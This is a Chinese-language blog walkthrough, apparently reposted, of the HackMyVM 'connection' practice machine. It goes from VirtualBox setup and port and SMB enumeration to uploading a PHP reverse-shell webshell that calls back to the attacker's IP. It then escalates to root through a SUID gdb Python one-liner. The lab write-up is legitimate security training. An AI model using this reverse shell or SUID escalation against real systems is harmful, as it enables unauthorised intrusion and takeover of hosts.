打靶手机之hackmyvm--connection

admin 2024年2月1日00:21:03评论22 views字数 1655阅读5分31秒阅读模式
(没错,标题是错别字,是手记....)有读者想看打靶的文章,那就出个系列好啦

安装virtualbox

先虚拟机配置,麋鹿运行靶场的环境为centos7,先在vmware设置里里启用虚拟化

打靶手机之hackmyvm--connection

1.添加 VirtualBox 仓库

创建一个新的 repo 文件

sudo vim /etc/yum.repos.d/virtualbox.repo

写入以下内容

[VirtualBox]
name=Oracle Linux / RHEL / CentOS-7 / x86_64 - VirtualBox
baseurl=http://download.virtualbox.org/virtualbox/rpm/el/7/x86_64
enabled=1
gpgcheck=1
gpgkey=https://www.virtualbox.org/download/oracle_vbox.asc

2.安装依赖项:

sudo yum install -y gcc make perl kernel-devel kernel-headers dkms

3.安装VirtualBox

sudo yum install -y VirtualBox-5.2

3.重建内核模块

sudo /sbin/vboxconfig

4.验证安装

VirtualBox --version

打靶手机之hackmyvm--connection

下载今日靶场

打靶手机之hackmyvm--connection

导入VirtualBox并运行

配置网络

如下图,centos和kali选nat

打靶手机之hackmyvm--connection

靶机选桥接,接口选以太网接口,也就是物理网络接口。

打靶手机之hackmyvm--connection

打靶手机之hackmyvm--connection

桥接和nat的区别之前文章提到过,不懂的去看一下那张图

信息收集

先扫网段

打靶手机之hackmyvm--connection

然后端口

打靶手机之hackmyvm--connection

有ssh,http,smb

先看一下web页面,默认页面

打靶手机之hackmyvm--connection

扫目录

打靶手机之hackmyvm--connection

没有东西,端口扫描发现445开放,那就去看看smb

smbmap -H 192.168.131.138

打靶手机之hackmyvm--connection

有一个共享文件夹,尝试连接一下,这个目录看起来像之前的默认页面目录

打靶手机之hackmyvm--connection

下载看一下文件内容

打靶手机之hackmyvm--connection

就是刚才的那个默认页面,此目录应该就是web目录了

打靶手机之hackmyvm--connection

好了,现在直接尝试构造上传一个反弹shell的马子到靶机,然后访问

<?php$ip = '192.168.131.134';$port = 4444;$sock = fsockopen($ip, $port);$proc = proc_open('/bin/sh -i', array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?>

打靶手机之hackmyvm--connection

弹回来了

打靶手机之hackmyvm--connection

提权

有备份

打靶手机之hackmyvm--connection

本想着看看能不能爆破,结果没有下载权限

那就试一下suid提权,先看一下suid信息

find / -user root -perm -4000 -print 2>/dev/null

打靶手机之hackmyvm--connection

有gdb,那一会可以试一下相应的payload,这里先解释一下suid的提权原理
首先说一下suid提权简单来理解就是这些可执行文件会以文件的所有者的权限来执行这个可执行文件,如果他们的所有者是root,那就是以root权限执行,比如有个文件以你当前的权限看不到,然后发现suid中有个cat,那你就可以用cat去查看了,小白难理解就想这就像“方宝剑”一样,用它就如同root亲临。

而我们用其中存在的一些命令去尝试构造一个长时间的高权shell就达到了提权的目的了。

再说回gdb提权,首先什么是gdb,官方来说gdb是GNU开源组织发布的一个强大的Unix/Linux下的程序调试工具,通过shell操作,可以实现各类IDE类似的调试功能。

但我们在此处只要记住它的一个功能就是,gbd可以启动程序,让程序员可以自定义地运行程序。那我们就可以用它调用python,弹个shell回来,结合suid,这个回来的shell就是root权限了。
具体如下:GNU调试器(GDB)允许执行自定义的Python脚本,也就是可以支持编译自定义gdb

gdb -nx -ex 'python import os; os.execl("/bin/sh","sh","-p")' -ex quit

打靶手机之hackmyvm--connection

读flag

打靶手机之hackmyvm--connection

打靶手机之hackmyvm--connection

结束,这个靶场很简单,思路就是smb上传webshell,然后gdb提权

原文始发于微信公众号(麋鹿安全):打靶手机之hackmyvm--connection

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月1日00:21:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶手机之hackmyvm--connectionhttp://cn-sec.com/archives/2452678.html

发表评论

匿名网友 填写信息